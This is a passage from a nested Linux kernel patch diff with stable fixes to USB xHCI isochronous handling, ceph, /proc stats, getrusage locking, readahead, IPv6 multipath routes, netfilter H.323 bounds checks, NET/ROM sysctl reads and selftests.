++				goto cleanup;
++			}
++
++			/*
++			 * xhci 4.10.2 states isoc endpoints should continue
++			 * processing the next TD if there was an error mid TD.
++			 * So hosts like NEC don't generate an event for the last
++			 * isoc TRB even if the IOC flag is set.
++			 * xhci 4.9.1 states that if there are errors in multi-TRB
++			 * TDs the xHC should generate an error for that TRB, and if the
++			 * xHC proceeds to the next TD it should generate an event for
++			 * any TRB with the IOC flag on the way. Other hosts follow this.
++			 * So this event might be for the next TD.
++			 */
++			if (td->error_mid_td &&
++			    !list_is_last(&td->td_list, &ep_ring->td_list)) {
++				struct xhci_td *td_next = list_next_entry(td, td_list);
++
++				ep_seg = trb_in_td(xhci, td_next->start_seg, td_next->first_trb,
++						   td_next->last_trb, ep_trb_dma, false);
++				if (ep_seg) {
++					/* give back previous TD, start handling new */
++					xhci_dbg(xhci, "Missing TD completion event after mid TD error\n");
++					ep_ring->dequeue = td->last_trb;
++					ep_ring->deq_seg = td->last_trb_seg;
++					inc_deq(xhci, ep_ring);
++					xhci_td_cleanup(xhci, td, ep_ring, td->status);
++					td = td_next;
+ 				}
++			}
++
++			if (!ep_seg) {
+ 				/* HC is busted, give up! */
+ 				xhci_err(xhci,
+ 					"ERROR Transfer event TRB DMA ptr not "
+@@ -2823,9 +2876,6 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 					  ep_trb_dma, true);
+ 				return -ESHUTDOWN;
+ 			}
+-
+-			skip_isoc_td(xhci, td, ep, status);
+-			goto cleanup;
+ 		}
+ 		if (trb_comp_code == COMP_SHORT_PACKET)
+ 			ep_ring->last_td_was_short = true;
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index 1354310cb37b1..fc25a5b09710c 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1570,6 +1570,7 @@ struct xhci_td {
+ 	struct xhci_segment	*bounce_seg;
+ 	/* actual_length of the URB has already been set */
+ 	bool			urb_length_set;
++	bool			error_mid_td;
+ 	unsigned int		num_trbs;
+ };
+ 
+diff --git a/fs/ceph/mdsmap.c b/fs/ceph/mdsmap.c
+index 3fbabc98e1f70..4a089d70ebd07 100644
+--- a/fs/ceph/mdsmap.c
++++ b/fs/ceph/mdsmap.c
+@@ -379,10 +379,11 @@ struct ceph_mdsmap *ceph_mdsmap_decode(void **p, void *end, bool msgr2)
+ 		ceph_decode_skip_8(p, end, bad_ext);
+ 		/* required_client_features */
+ 		ceph_decode_skip_set(p, end, 64, bad_ext);
++		/* bal_rank_mask */
++		ceph_decode_skip_string(p, end, bad_ext);
++	}
++	if (mdsmap_ev >= 18) {
+ 		ceph_decode_64_safe(p, end, m->m_max_xattr_size, bad_ext);
+-	} else {
+-		/* This forces the usage of the (sync) SETXATTR Op */
+-		m->m_max_xattr_size = 0;
+ 	}
+ bad_ext:
+ 	dout("mdsmap_decode m_enabled: %d, m_damaged: %d, m_num_laggy: %d\n",
+diff --git a/fs/erofs/data.c b/fs/erofs/data.c
+index b32801d716f89..9d20e5d23ae0b 100644
+--- a/fs/erofs/data.c
++++ b/fs/erofs/data.c
+@@ -440,4 +440,5 @@ const struct file_operations erofs_file_fops = {
+ 	.read_iter	= erofs_file_read_iter,
+ 	.mmap		= erofs_file_mmap,
+ 	.splice_read	= generic_file_splice_read,
++	.get_unmapped_area = thp_get_unmapped_area,
+ };
+diff --git a/fs/proc/array.c b/fs/proc/array.c
+index 1b0d78dfd20f9..d210b2f8b7ed5 100644
+--- a/fs/proc/array.c
++++ b/fs/proc/array.c
+@@ -467,13 +467,13 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 	int permitted;
+ 	struct mm_struct *mm;
+ 	unsigned long long start_time;
+-	unsigned long cmin_flt = 0, cmaj_flt = 0;
+-	unsigned long  min_flt = 0,  maj_flt = 0;
+-	u64 cutime, cstime, utime, stime;
+-	u64 cgtime, gtime;
++	unsigned long cmin_flt, cmaj_flt, min_flt, maj_flt;
++	u64 cutime, cstime, cgtime, utime, stime, gtime;
+ 	unsigned long rsslim = 0;
+ 	unsigned long flags;
+ 	int exit_code = task->exit_code;
++	struct signal_struct *sig = task->signal;
++	unsigned int seq = 1;
+ 
+ 	state = *get_task_state(task);
+ 	vsize = eip = esp = 0;
+@@ -501,12 +501,8 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 
+ 	sigemptyset(&sigign);
+ 	sigemptyset(&sigcatch);
+-	cutime = cstime = 0;
+-	cgtime = gtime = 0;
+ 
+ 	if (lock_task_sighand(task, &flags)) {
+-		struct signal_struct *sig = task->signal;
+-
+ 		if (sig->tty) {
+ 			struct pid *pgrp = tty_get_pgrp(sig->tty);
+ 			tty_pgrp = pid_nr_ns(pgrp, ns);
+@@ -517,26 +513,9 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 		num_threads = get_nr_threads(task);
+ 		collect_sigign_sigcatch(task, &sigign, &sigcatch);
+ 
+-		cmin_flt = sig->cmin_flt;
+-		cmaj_flt = sig->cmaj_flt;
+-		cutime = sig->cutime;
+-		cstime = sig->cstime;
+-		cgtime = sig->cgtime;
+ 		rsslim = READ_ONCE(sig->rlim[RLIMIT_RSS].rlim_cur);
+ 
+-		/* add up live thread stats at the group level */
+ 		if (whole) {
+-			struct task_struct *t = task;
+-			do {
+-				min_flt += t->min_flt;
+-				maj_flt += t->maj_flt;
+-				gtime += task_gtime(t);
+-			} while_each_thread(task, t);
+-
+-			min_flt += sig->min_flt;
+-			maj_flt += sig->maj_flt;
+-			gtime += sig->gtime;
+-
+ 			if (sig->flags & (SIGNAL_GROUP_EXIT | SIGNAL_STOP_STOPPED))
+ 				exit_code = sig->group_exit_code;
+ 		}
+@@ -551,6 +530,34 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 	if (permitted && (!whole || num_threads < 2))
+ 		wchan = !task_is_running(task);
+ 
++	do {
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
++		flags = read_seqbegin_or_lock_irqsave(&sig->stats_lock, &seq);
++
++		cmin_flt = sig->cmin_flt;
++		cmaj_flt = sig->cmaj_flt;
++		cutime = sig->cutime;
++		cstime = sig->cstime;
++		cgtime = sig->cgtime;
++
++		if (whole) {
++			struct task_struct *t;
++
++			min_flt = sig->min_flt;
++			maj_flt = sig->maj_flt;
++			gtime = sig->gtime;
++
++			rcu_read_lock();
++			__for_each_thread(sig, t) {
++				min_flt += t->min_flt;
++				maj_flt += t->maj_flt;
++				gtime += task_gtime(t);
++			}
++			rcu_read_unlock();
++		}
++	} while (need_seqretry(&sig->stats_lock, seq));
++	done_seqretry_irqrestore(&sig->stats_lock, seq, flags);
++
+ 	if (whole) {
+ 		thread_group_cputime_adjusted(task, &utime, &stime);
+ 	} else {
+diff --git a/include/linux/ceph/mdsmap.h b/include/linux/ceph/mdsmap.h
+index 4c3e0648dc277..fcc95bff72a57 100644
+--- a/include/linux/ceph/mdsmap.h
++++ b/include/linux/ceph/mdsmap.h
+@@ -25,7 +25,11 @@ struct ceph_mdsmap {
+ 	u32 m_session_timeout;          /* seconds */
+ 	u32 m_session_autoclose;        /* seconds */
+ 	u64 m_max_file_size;
+-	u64 m_max_xattr_size;		/* maximum size for xattrs blob */
++	/*
++	 * maximum size for xattrs blob.
++	 * Zeroed by default to force the usage of the (sync) SETXATTR Op.
++	 */
++	u64 m_max_xattr_size;
+ 	u32 m_max_mds;			/* expected up:active mds number */
+ 	u32 m_num_active_mds;		/* actual up:active mds number */
+ 	u32 possible_max_rank;		/* possible max rank index */
+diff --git a/include/linux/cpu.h b/include/linux/cpu.h
+index 008bfa68cfabc..4b06b1f1e267a 100644
+--- a/include/linux/cpu.h
++++ b/include/linux/cpu.h
+@@ -74,6 +74,8 @@ extern ssize_t cpu_show_spec_rstack_overflow(struct device *dev,
+ 					     struct device_attribute *attr, char *buf);
+ extern ssize_t cpu_show_gds(struct device *dev,
+ 			    struct device_attribute *attr, char *buf);
++extern ssize_t cpu_show_reg_file_data_sampling(struct device *dev,
++					       struct device_attribute *attr, char *buf);
+ 
+ extern __printf(4, 5)
+ struct device *cpu_device_create(struct device *parent, void *drvdata,
+diff --git a/include/trace/events/qdisc.h b/include/trace/events/qdisc.h
+index a3995925cb057..1f4258308b967 100644
+--- a/include/trace/events/qdisc.h
++++ b/include/trace/events/qdisc.h
+@@ -81,14 +81,14 @@ TRACE_EVENT(qdisc_reset,
+ 	TP_ARGS(q),
+ 
+ 	TP_STRUCT__entry(
+-		__string(	dev,		qdisc_dev(q)	)
+-		__string(	kind,		q->ops->id	)
+-		__field(	u32,		parent		)
+-		__field(	u32,		handle		)
++		__string(	dev,		qdisc_dev(q)->name	)
++		__string(	kind,		q->ops->id		)
++		__field(	u32,		parent			)
++		__field(	u32,		handle			)
+ 	),
+ 
+ 	TP_fast_assign(
+-		__assign_str(dev, qdisc_dev(q));
++		__assign_str(dev, qdisc_dev(q)->name);
+ 		__assign_str(kind, q->ops->id);
+ 		__entry->parent = q->parent;
+ 		__entry->handle = q->handle;
+@@ -106,14 +106,14 @@ TRACE_EVENT(qdisc_destroy,
+ 	TP_ARGS(q),
+ 
+ 	TP_STRUCT__entry(
+-		__string(	dev,		qdisc_dev(q)	)
+-		__string(	kind,		q->ops->id	)
+-		__field(	u32,		parent		)
+-		__field(	u32,		handle		)
++		__string(	dev,		qdisc_dev(q)->name	)
++		__string(	kind,		q->ops->id		)
++		__field(	u32,		parent			)
++		__field(	u32,		handle			)
+ 	),
+ 
+ 	TP_fast_assign(
+-		__assign_str(dev, qdisc_dev(q));
++		__assign_str(dev, qdisc_dev(q)->name);
+ 		__assign_str(kind, q->ops->id);
+ 		__entry->parent = q->parent;
+ 		__entry->handle = q->handle;
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index 08a8e81027289..0508937048137 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -222,7 +222,7 @@ static int cpu_map_bpf_prog_run_xdp(struct bpf_cpu_map_entry *rcpu,
+ 				    void **frames, int n,
+ 				    struct xdp_cpumap_stats *stats)
+ {
+-	struct xdp_rxq_info rxq;
++	struct xdp_rxq_info rxq = {};
+ 	struct xdp_buff xdp;
+ 	int i, nframes = 0;
+ 
+diff --git a/kernel/sys.c b/kernel/sys.c
+index c85e1abf7b7c7..d06eda1387b69 100644
+--- a/kernel/sys.c
++++ b/kernel/sys.c
+@@ -1778,74 +1778,87 @@ void getrusage(struct task_struct *p, int who, struct rusage *r)
+ 	struct task_struct *t;
+ 	unsigned long flags;
+ 	u64 tgutime, tgstime, utime, stime;
+-	unsigned long maxrss = 0;
++	unsigned long maxrss;
++	struct mm_struct *mm;
++	struct signal_struct *sig = p->signal;
++	unsigned int seq = 0;
+ 
+-	memset((char *)r, 0, sizeof (*r));
++retry:
++	memset(r, 0, sizeof(*r));
+ 	utime = stime = 0;
++	maxrss = 0;
+ 
+ 	if (who == RUSAGE_THREAD) {
+ 		task_cputime_adjusted(current, &utime, &stime);
+ 		accumulate_thread_rusage(p, r);
+-		maxrss = p->signal->maxrss;
+-		goto out;
++		maxrss = sig->maxrss;
++		goto out_thread;
+ 	}
+ 
+-	if (!lock_task_sighand(p, &flags))
+-		return;
++	flags = read_seqbegin_or_lock_irqsave(&sig->stats_lock, &seq);
+ 
+ 	switch (who) {
+ 	case RUSAGE_BOTH:
+ 	case RUSAGE_CHILDREN:
+-		utime = p->signal->cutime;
+-		stime = p->signal->cstime;
+-		r->ru_nvcsw = p->signal->cnvcsw;
+-		r->ru_nivcsw = p->signal->cnivcsw;
+-		r->ru_minflt = p->signal->cmin_flt;
+-		r->ru_majflt = p->signal->cmaj_flt;
+-		r->ru_inblock = p->signal->cinblock;
+-		r->ru_oublock = p->signal->coublock;
+-		maxrss = p->signal->cmaxrss;
++		utime = sig->cutime;
++		stime = sig->cstime;
++		r->ru_nvcsw = sig->cnvcsw;
++		r->ru_nivcsw = sig->cnivcsw;
++		r->ru_minflt = sig->cmin_flt;
++		r->ru_majflt = sig->cmaj_flt;
++		r->ru_inblock = sig->cinblock;
++		r->ru_oublock = sig->coublock;
++		maxrss = sig->cmaxrss;
+ 
+ 		if (who == RUSAGE_CHILDREN)
+ 			break;
+ 		fallthrough;
+ 
+ 	case RUSAGE_SELF:
+-		thread_group_cputime_adjusted(p, &tgutime, &tgstime);
+-		utime += tgutime;
+-		stime += tgstime;
+-		r->ru_nvcsw += p->signal->nvcsw;
+-		r->ru_nivcsw += p->signal->nivcsw;
+-		r->ru_minflt += p->signal->min_flt;
+-		r->ru_majflt += p->signal->maj_flt;
+-		r->ru_inblock += p->signal->inblock;
+-		r->ru_oublock += p->signal->oublock;
+-		if (maxrss < p->signal->maxrss)
+-			maxrss = p->signal->maxrss;
+-		t = p;
+-		do {
++		r->ru_nvcsw += sig->nvcsw;
++		r->ru_nivcsw += sig->nivcsw;
++		r->ru_minflt += sig->min_flt;
++		r->ru_majflt += sig->maj_flt;
++		r->ru_inblock += sig->inblock;
++		r->ru_oublock += sig->oublock;
++		if (maxrss < sig->maxrss)
++			maxrss = sig->maxrss;
++
++		rcu_read_lock();
++		__for_each_thread(sig, t)
+ 			accumulate_thread_rusage(t, r);
+-		} while_each_thread(p, t);
++		rcu_read_unlock();
++
+ 		break;
+ 
+ 	default:
+ 		BUG();
+ 	}
+-	unlock_task_sighand(p, &flags);
+ 
+-out:
+-	r->ru_utime = ns_to_kernel_old_timeval(utime);
+-	r->ru_stime = ns_to_kernel_old_timeval(stime);
++	if (need_seqretry(&sig->stats_lock, seq)) {
++		seq = 1;
++		goto retry;
++	}
++	done_seqretry_irqrestore(&sig->stats_lock, seq, flags);
+ 
+-	if (who != RUSAGE_CHILDREN) {
+-		struct mm_struct *mm = get_task_mm(p);
++	if (who == RUSAGE_CHILDREN)
++		goto out_children;
+ 
+-		if (mm) {
+-			setmax_mm_hiwater_rss(&maxrss, mm);
+-			mmput(mm);
+-		}
++	thread_group_cputime_adjusted(p, &tgutime, &tgstime);
++	utime += tgutime;
++	stime += tgstime;
++
++out_thread:
++	mm = get_task_mm(p);
++	if (mm) {
++		setmax_mm_hiwater_rss(&maxrss, mm);
++		mmput(mm);
+ 	}
++
++out_children:
+ 	r->ru_maxrss = maxrss * (PAGE_SIZE / 1024); /* convert pages to KBs */
++	r->ru_utime = ns_to_kernel_old_timeval(utime);
++	r->ru_stime = ns_to_kernel_old_timeval(stime);
+ }
+ 
+ SYSCALL_DEFINE2(getrusage, int, who, struct rusage __user *, ru)
+diff --git a/mm/readahead.c b/mm/readahead.c
+index ba43428043a35..e4b772bb70e68 100644
+--- a/mm/readahead.c
++++ b/mm/readahead.c
+@@ -483,7 +483,7 @@ static inline int ra_alloc_folio(struct readahead_control *ractl, pgoff_t index,
+ 
+ 	if (!folio)
+ 		return -ENOMEM;
+-	mark = round_up(mark, 1UL << order);
++	mark = round_down(mark, 1UL << order);
+ 	if (index == mark)
+ 		folio_set_readahead(folio);
+ 	err = filemap_add_folio(ractl->mapping, folio, index, gfp);
+@@ -591,7 +591,7 @@ static void ondemand_readahead(struct readahead_control *ractl,
+ 	 * It's the expected callback index, assume sequential access.
+ 	 * Ramp up sizes, and push forward the readahead window.
+ 	 */
+-	expected = round_up(ra->start + ra->size - ra->async_size,
++	expected = round_down(ra->start + ra->size - ra->async_size,
+ 			1UL << order);
+ 	if (index == expected || index == (ra->start + ra->size)) {
+ 		ra->start += ra->size;
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 7f65dc750feb8..887599d351b8d 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -5335,19 +5335,7 @@ static int ip6_route_multipath_add(struct fib6_config *cfg,
+ 	err_nh = NULL;
+ 	list_for_each_entry(nh, &rt6_nh_list, next) {
+ 		err = __ip6_ins_rt(nh->fib6_info, info, extack);
+-		fib6_info_release(nh->fib6_info);
+-
+-		if (!err) {
+-			/* save reference to last route successfully inserted */
+-			rt_last = nh->fib6_info;
+-
+-			/* save reference to first route for notification */
+-			if (!rt_notif)
+-				rt_notif = nh->fib6_info;
+-		}
+ 
+-		/* nh->fib6_info is used or freed at this point, reset to NULL*/
+-		nh->fib6_info = NULL;
+ 		if (err) {
+ 			if (replace && nhn)
+ 				NL_SET_ERR_MSG_MOD(extack,
+@@ -5355,6 +5343,12 @@ static int ip6_route_multipath_add(struct fib6_config *cfg,
+ 			err_nh = nh;
+ 			goto add_errout;
+ 		}
++		/* save reference to last route successfully inserted */
++		rt_last = nh->fib6_info;
++
++		/* save reference to first route for notification */
++		if (!rt_notif)
++			rt_notif = nh->fib6_info;
+ 
+ 		/* Because each route is added like a single route we remove
+ 		 * these flags after the first nexthop: if there is a collision,
+@@ -5415,8 +5409,7 @@ static int ip6_route_multipath_add(struct fib6_config *cfg,
+ 
+ cleanup:
+ 	list_for_each_entry_safe(nh, nh_safe, &rt6_nh_list, next) {
+-		if (nh->fib6_info)
+-			fib6_info_release(nh->fib6_info);
++		fib6_info_release(nh->fib6_info);
+ 		list_del(&nh->next);
+ 		kfree(nh);
+ 	}
+diff --git a/net/netfilter/nf_conntrack_h323_asn1.c b/net/netfilter/nf_conntrack_h323_asn1.c
+index e697a824b0018..540d97715bd23 100644
+--- a/net/netfilter/nf_conntrack_h323_asn1.c
++++ b/net/netfilter/nf_conntrack_h323_asn1.c
+@@ -533,6 +533,8 @@ static int decode_seq(struct bitstr *bs, const struct field_t *f,
+ 	/* Get fields bitmap */
+ 	if (nf_h323_error_boundary(bs, 0, f->sz))
+ 		return H323_ERROR_BOUND;
++	if (f->sz > 32)
++		return H323_ERROR_RANGE;
+ 	bmp = get_bitmap(bs, f->sz);
+ 	if (base)
+ 		*(unsigned int *)base = bmp;
+@@ -589,6 +591,8 @@ static int decode_seq(struct bitstr *bs, const struct field_t *f,
+ 	bmp2_len = get_bits(bs, 7) + 1;
+ 	if (nf_h323_error_boundary(bs, 0, bmp2_len))
+ 		return H323_ERROR_BOUND;
++	if (bmp2_len > 32)
++		return H323_ERROR_RANGE;
+ 	bmp2 = get_bitmap(bs, bmp2_len);
+ 	bmp |= bmp2 >> f->sz;
+ 	if (base)
+diff --git a/net/netfilter/nft_ct.c b/net/netfilter/nft_ct.c
+index 8df7564f0611e..2bfe3cdfbd581 100644
+--- a/net/netfilter/nft_ct.c
++++ b/net/netfilter/nft_ct.c
+@@ -1237,14 +1237,13 @@ static int nft_ct_expect_obj_init(const struct nft_ctx *ctx,
+ 	switch (priv->l3num) {
+ 	case NFPROTO_IPV4:
+ 	case NFPROTO_IPV6:
+-		if (priv->l3num != ctx->family)
+-			return -EINVAL;
++		if (priv->l3num == ctx->family || ctx->family == NFPROTO_INET)
++			break;
+ 
+-		fallthrough;
+-	case NFPROTO_INET:
+-		break;
++		return -EINVAL;
++	case NFPROTO_INET: /* tuple.src.l3num supports NFPROTO_IPV4/6 only */
+ 	default:
+-		return -EOPNOTSUPP;
++		return -EAFNOSUPPORT;
+ 	}
+ 
+ 	priv->l4proto = nla_get_u8(tb[NFTA_CT_EXPECT_L4PROTO]);
+diff --git a/net/netrom/af_netrom.c b/net/netrom/af_netrom.c
+index ec5747969f964..f0879295de110 100644
+--- a/net/netrom/af_netrom.c
++++ b/net/netrom/af_netrom.c
+@@ -453,16 +453,16 @@ static int nr_create(struct net *net, struct socket *sock, int protocol,
+ 	nr_init_timers(sk);
+ 
+ 	nr->t1     =
+-		msecs_to_jiffies(sysctl_netrom_transport_timeout);
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_timeout));
+ 	nr->t2     =
+-		msecs_to_jiffies(sysctl_netrom_transport_acknowledge_delay);
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_acknowledge_delay));
+ 	nr->n2     =
+-		msecs_to_jiffies(sysctl_netrom_transport_maximum_tries);
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_maximum_tries));
+ 	nr->t4     =
+-		msecs_to_jiffies(sysctl_netrom_transport_busy_delay);
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_busy_delay));
+ 	nr->idle   =
+-		msecs_to_jiffies(sysctl_netrom_transport_no_activity_timeout);
+-	nr->window = sysctl_netrom_transport_requested_window_size;
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_no_activity_timeout));
++	nr->window = READ_ONCE(sysctl_netrom_transport_requested_window_size);
+ 
+ 	nr->bpqext = 1;
+ 	nr->state  = NR_STATE_0;
+@@ -954,7 +954,7 @@ int nr_rx_frame(struct sk_buff *skb, struct net_device *dev)
+ 		 * G8PZT's Xrouter which is sending packets with command type 7
+ 		 * as an extension of the protocol.
+ 		 */
+-		if (sysctl_netrom_reset_circuit &&
++		if (READ_ONCE(sysctl_netrom_reset_circuit) &&
+ 		    (frametype != NR_RESET || flags != 0))
+ 			nr_transmit_reset(skb, 1);
+ 
+diff --git a/net/netrom/nr_dev.c b/net/netrom/nr_dev.c
+index 3aaac4a22b387..2c34389c3ce6f 100644
+--- a/net/netrom/nr_dev.c
++++ b/net/netrom/nr_dev.c
+@@ -81,7 +81,7 @@ static int nr_header(struct sk_buff *skb, struct net_device *dev,
+ 	buff[6] |= AX25_SSSID_SPARE;
+ 	buff    += AX25_ADDR_LEN;
+ 
+-	*buff++ = sysctl_netrom_network_ttl_initialiser;
++	*buff++ = READ_ONCE(sysctl_netrom_network_ttl_initialiser);
+ 
+ 	*buff++ = NR_PROTO_IP;
+ 	*buff++ = NR_PROTO_IP;
+diff --git a/net/netrom/nr_in.c b/net/netrom/nr_in.c
+index 2f084b6f69d7e..97944db6b5ac6 100644
+--- a/net/netrom/nr_in.c
++++ b/net/netrom/nr_in.c
+@@ -97,7 +97,7 @@ static int nr_state1_machine(struct sock *sk, struct sk_buff *skb,
+ 		break;
+ 
+ 	case NR_RESET:
+-		if (sysctl_netrom_reset_circuit)
++		if (READ_ONCE(sysctl_netrom_reset_circuit))
+ 			nr_disconnect(sk, ECONNRESET);
+ 		break;
+ 
+@@ -128,7 +128,7 @@ static int nr_state2_machine(struct sock *sk, struct sk_buff *skb,
+ 		break;
+ 
+ 	case NR_RESET:
+-		if (sysctl_netrom_reset_circuit)
++		if (READ_ONCE(sysctl_netrom_reset_circuit))
+ 			nr_disconnect(sk, ECONNRESET);
+ 		break;
+ 
+@@ -262,7 +262,7 @@ static int nr_state3_machine(struct sock *sk, struct sk_buff *skb, int frametype
+ 		break;
+ 
+ 	case NR_RESET:
+-		if (sysctl_netrom_reset_circuit)
++		if (READ_ONCE(sysctl_netrom_reset_circuit))
+ 			nr_disconnect(sk, ECONNRESET);
+ 		break;
+ 
+diff --git a/net/netrom/nr_out.c b/net/netrom/nr_out.c
+index 44929657f5b71..5e531394a724b 100644
+--- a/net/netrom/nr_out.c
++++ b/net/netrom/nr_out.c
+@@ -204,7 +204,7 @@ void nr_transmit_buffer(struct sock *sk, struct sk_buff *skb)
+ 	dptr[6] |= AX25_SSSID_SPARE;
+ 	dptr += AX25_ADDR_LEN;
+ 
+-	*dptr++ = sysctl_netrom_network_ttl_initialiser;
++	*dptr++ = READ_ONCE(sysctl_netrom_network_ttl_initialiser);
+ 
+ 	if (!nr_route_frame(skb, NULL)) {
+ 		kfree_skb(skb);
+diff --git a/net/netrom/nr_route.c b/net/netrom/nr_route.c
+index baea3cbd76ca5..70480869ad1c5 100644
+--- a/net/netrom/nr_route.c
++++ b/net/netrom/nr_route.c
+@@ -153,7 +153,7 @@ static int __must_check nr_add_node(ax25_address *nr, const char *mnemonic,
+ 		nr_neigh->digipeat = NULL;
+ 		nr_neigh->ax25     = NULL;
+ 		nr_neigh->dev      = dev;
+-		nr_neigh->quality  = sysctl_netrom_default_path_quality;
++		nr_neigh->quality  = READ_ONCE(sysctl_netrom_default_path_quality);
+ 		nr_neigh->locked   = 0;
+ 		nr_neigh->count    = 0;
+ 		nr_neigh->number   = nr_neigh_no++;
+@@ -728,7 +728,7 @@ void nr_link_failed(ax25_cb *ax25, int reason)
+ 	nr_neigh->ax25 = NULL;
+ 	ax25_cb_put(ax25);
+ 
+-	if (++nr_neigh->failed < sysctl_netrom_link_fails_count) {
++	if (++nr_neigh->failed < READ_ONCE(sysctl_netrom_link_fails_count)) {
+ 		nr_neigh_put(nr_neigh);
+ 		return;
+ 	}
+@@ -766,7 +766,7 @@ int nr_route_frame(struct sk_buff *skb, ax25_cb *ax25)
+ 	if (ax25 != NULL) {
+ 		ret = nr_add_node(nr_src, "", &ax25->dest_addr, ax25->digipeat,
+ 				  ax25->ax25_dev->dev, 0,
+-				  sysctl_netrom_obsolescence_count_initialiser);
++				  READ_ONCE(sysctl_netrom_obsolescence_count_initialiser));
+ 		if (ret)
+ 			return ret;
+ 	}
+@@ -780,7 +780,7 @@ int nr_route_frame(struct sk_buff *skb, ax25_cb *ax25)
+ 		return ret;
+ 	}
+ 
+-	if (!sysctl_netrom_routing_control && ax25 != NULL)
++	if (!READ_ONCE(sysctl_netrom_routing_control) && ax25 != NULL)
+ 		return 0;
+ 
+ 	/* Its Time-To-Live has expired */
+diff --git a/net/netrom/nr_subr.c b/net/netrom/nr_subr.c
+index e2d2af924cff4..c3bbd5880850b 100644
+--- a/net/netrom/nr_subr.c
++++ b/net/netrom/nr_subr.c
+@@ -182,7 +182,8 @@ void nr_write_internal(struct sock *sk, int frametype)
+ 		*dptr++ = nr->my_id;
+ 		*dptr++ = frametype;
+ 		*dptr++ = nr->window;
+-		if (nr->bpqext) *dptr++ = sysctl_netrom_network_ttl_initialiser;
++		if (nr->bpqext)
++			*dptr++ = READ_ONCE(sysctl_netrom_network_ttl_initialiser);
+ 		break;
+ 
+ 	case NR_DISCREQ:
+@@ -236,7 +237,7 @@ void __nr_transmit_reply(struct sk_buff *skb, int mine, unsigned char cmdflags)
+ 	dptr[6] |= AX25_SSSID_SPARE;
+ 	dptr += AX25_ADDR_LEN;
+ 
+-	*dptr++ = sysctl_netrom_network_ttl_initialiser;
++	*dptr++ = READ_ONCE(sysctl_netrom_network_ttl_initialiser);
+ 
+ 	if (mine) {
+ 		*dptr++ = 0;
+diff --git a/net/rds/rdma.c b/net/rds/rdma.c
+index fba82d36593ad..a4e3c5de998be 100644
+--- a/net/rds/rdma.c
++++ b/net/rds/rdma.c
+@@ -301,6 +301,9 @@ static int __rds_rdma_map(struct rds_sock *rs, struct rds_get_mr_args *args,
+ 			kfree(sg);
+ 		}
+ 		ret = PTR_ERR(trans_private);
++		/* Trigger connection so that its ready for the next retry */
++		if (ret == -ENODEV)
++			rds_conn_connect_if_down(cp->cp_conn);
+ 		goto out;
+ 	}
+ 
+diff --git a/net/rds/send.c b/net/rds/send.c
+index 0c5504068e3c2..a4ba45c430d81 100644
+--- a/net/rds/send.c
++++ b/net/rds/send.c
+@@ -1314,12 +1314,8 @@ int rds_sendmsg(struct socket *sock, struct msghdr *msg, size_t payload_len)
+ 
+ 	/* Parse any control messages the user may have included. */
+ 	ret = rds_cmsg_send(rs, rm, msg, &allocated_mr, &vct);
+-	if (ret) {
+-		/* Trigger connection so that its ready for the next retry */
+-		if (ret ==  -EAGAIN)
+-			rds_conn_connect_if_down(conn);
++	if (ret)
+ 		goto out;
+-	}
+ 
+ 	if (rm->rdma.op_active && !conn->c_trans->xmit_rdma) {
+ 		printk_ratelimited(KERN_NOTICE "rdma_op %p conn xmit_rdma %p\n",
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index e80be4e4fa8b4..555b74e7172d8 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -210,7 +210,7 @@ struct wcd938x_priv {
+ };
+ 
+ static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(ear_pa_gain, 600, -1800);
+-static const DECLARE_TLV_DB_SCALE(line_gain, -3000, 150, -3000);
++static const DECLARE_TLV_DB_SCALE(line_gain, -3000, 150, 0);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(analog_gain, 0, 3000);
+ 
+ struct wcd938x_mbhc_zdet_param {
+diff --git a/tools/testing/selftests/net/mptcp/simult_flows.sh b/tools/testing/selftests/net/mptcp/simult_flows.sh
+index 4a417f9d51d67..06ad0510469e3 100755
+--- a/tools/testing/selftests/net/mptcp/simult_flows.sh
++++ b/tools/testing/selftests/net/mptcp/simult_flows.sh
+@@ -301,10 +301,10 @@ done
+ 
+ setup
+ run_test 10 10 0 0 "balanced bwidth"
+-run_test 10 10 1 50 "balanced bwidth with unbalanced delay"
++run_test 10 10 1 25 "balanced bwidth with unbalanced delay"
+ 
+ # we still need some additional infrastructure to pass the following test-cases
+-run_test 30 10 0 0 "unbalanced bwidth"
+-run_test 30 10 1 50 "unbalanced bwidth with unbalanced delay"
+-run_test 30 10 50 1 "unbalanced bwidth with opposed, unbalanced delay"
++run_test 10 3 0 0 "unbalanced bwidth"
++run_test 10 3 1 25 "unbalanced bwidth with unbalanced delay"
++run_test 10 3 25 1 "unbalanced bwidth with opposed, unbalanced delay"
+ exit $ret
+diff --git a/tools/testing/selftests/vm/charge_reserved_hugetlb.sh b/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
+index 0899019a7fcb4..e14bdd4455f2d 100644
+--- a/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
++++ b/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
+@@ -1,4 +1,4 @@
+-#!/bin/sh
++#!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
+ # Kselftest framework requirement - SKIP code is 4.
+diff --git a/tools/testing/selftests/vm/map_hugetlb.c b/tools/testing/selftests/vm/map_hugetlb.c
+index 312889edb84ab..c65c55b7a789f 100644
